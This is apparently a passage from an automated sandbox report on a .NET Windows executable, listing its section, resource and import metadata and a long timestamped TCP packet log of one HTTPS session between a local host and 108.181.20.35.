.reloc	0x3e000	0xc	0x200	c02b14840025dcf301bf41a675e2c86c	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x3c05c	0x386	data			0.4312638580931264
RT_MANIFEST	0x3c41e	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 26, 2024 00:11:58.043149948 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:11:58.043226004 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:11:58.043332100 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:11:58.054132938 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:11:58.054152966 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:11:59.809353113 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:11:59.809431076 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:11:59.814493895 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:11:59.814507961 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:11:59.814832926 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:11:59.854239941 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:11:59.864628077 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:11:59.907332897 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:00.499751091 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:00.499814987 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:00.499838114 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:00.499871969 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:00.499876976 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:00.499906063 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:00.499908924 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:00.499922991 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:00.499933004 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:00.499954939 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:00.499972105 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:00.545453072 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:00.545473099 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:00.545528889 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:00.545541048 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:00.545578003 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:00.693605900 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:00.693667889 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:00.693733931 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:00.693751097 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:00.693902016 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:00.693902016 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:00.730875969 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:00.730895996 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:00.731070042 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:00.731076002 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:00.731120110 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:00.764168978 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:00.764215946 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:00.764259100 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:00.764265060 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:00.764295101 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:00.764338970 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:00.802618027 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:00.802699089 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:00.802803040 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:00.802803040 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:00.802809000 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:00.802848101 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:00.898329020 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:00.898386955 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:00.898452997 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:00.898462057 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:00.898493052 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:00.898515940 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:00.919167995 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:00.919187069 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:00.919363976 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:00.919370890 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:00.919410944 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:00.940944910 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:00.940992117 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:00.941030979 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:00.941035986 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:00.941087961 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:00.996972084 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:00.997020960 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:00.997056961 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:00.997066021 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:00.997102022 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.080271959 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.080328941 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.080423117 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.080435038 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.080466032 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.080487967 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.091836929 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.091881037 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.091914892 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.091922998 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.091952085 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.091970921 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.105339050 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.105381012 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.105427027 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.105470896 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.105498075 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.105521917 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.118566036 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.118587971 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.118691921 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.118697882 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.118737936 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.132076979 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.132100105 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.132154942 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.132160902 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.132199049 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.144710064 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.144754887 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.144778967 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.144783974 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.144833088 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.156296968 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.156341076 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.156371117 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.156375885 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.156404972 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.156426907 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.194639921 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.194716930 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.194753885 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.194770098 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.194936991 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.194936991 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.271739960 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.271792889 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.271919966 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.271919966 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.271939039 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.271985054 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.279632092 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.279675961 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.279721022 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.279727936 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.279768944 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.288141012 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.288184881 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.288214922 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.288219929 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.288243055 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.288264990 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.296658993 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.296703100 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.296730995 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.296736956 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.296760082 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.296782970 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.304141998 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.304202080 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.304254055 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.304260969 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.304282904 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.304305077 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.313020945 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.313044071 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.313126087 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.313133001 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.313179016 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.320431948 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.320457935 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.320511103 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.320518017 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.320558071 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.384608984 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.384668112 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.384825945 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.384826899 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.384836912 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.384884119 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.462481976 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.462506056 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.462555885 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.462573051 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.462594986 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.462614059 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.468300104 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.468321085 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.468370914 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.468378067 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.468441963 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.473418951 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.473438978 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.473484039 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.473490000 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.473517895 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.473541021 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.478984118 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.479001999 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.479053020 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.479057074 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.479096889 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.484795094 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.484822035 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.484870911 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.484879971 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.484913111 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.484932899 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.490231991 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.490252972 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.490293026 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.490299940 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.490324974 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.490348101 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.495953083 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.495976925 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.496032953 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.496040106 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.496072054 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.496090889 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.576430082 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.576459885 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.576682091 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.576682091 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.576703072 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.576740980 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.655742884 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.655776024 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.655877113 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.655903101 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.655941963 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.661278009 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.661302090 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.661381960 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.661391020 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.661429882 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.667671919 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.667692900 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.667778015 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.667790890 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.667829037 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.672144890 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.672169924 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.672245979 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.672261000 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.672287941 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.672307968 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.677813053 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.677834988 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.677898884 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.677908897 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.677930117 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.677959919 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.683393955 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.683418989 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.683491945 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.683506966 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.683543921 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.688941002 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.688961983 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.689035892 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.689043999 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.689085007 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.695240974 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.768258095 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.768290043 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.768455029 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.768455029 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.768476009 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.768511057 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.846582890 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.846604109 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.846698999 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.846725941 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.846862078 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.852193117 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.852210045 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.852277040 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.852283955 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.852315903 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.858026028 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.858042002 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.858103037 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.858109951 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.858149052 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.863091946 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.863110065 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.863172054 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.863179922 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.863217115 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.868768930 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.868786097 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.868844032 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.868850946 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.868886948 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.874196053 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.874212980 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.874272108 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.874278069 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.874315023 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.879910946 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.879926920 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.879988909 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.879995108 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.880043030 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.960938931 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.960957050 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.961041927 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.961052895 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:01.961091042 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:01.961091042 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.038580894 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.038598061 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.038674116 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.038707018 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.038754940 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.044244051 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.044260025 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.044322968 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.044334888 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.044373035 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.050050020 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.050069094 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.050103903 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.050115108 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.050143003 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.050167084 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.055063009 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.055079937 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.055114031 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.055123091 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.055155039 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.055172920 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.060887098 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.060904980 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.060939074 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.060947895 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.060976028 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.060998917 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.066267967 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.066288948 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.066333055 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.066342115 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.066365957 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.066394091 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.071978092 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.071996927 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.072030067 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.072041035 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.072079897 CET	49704	443	192.168.2.5	108.181.20.35
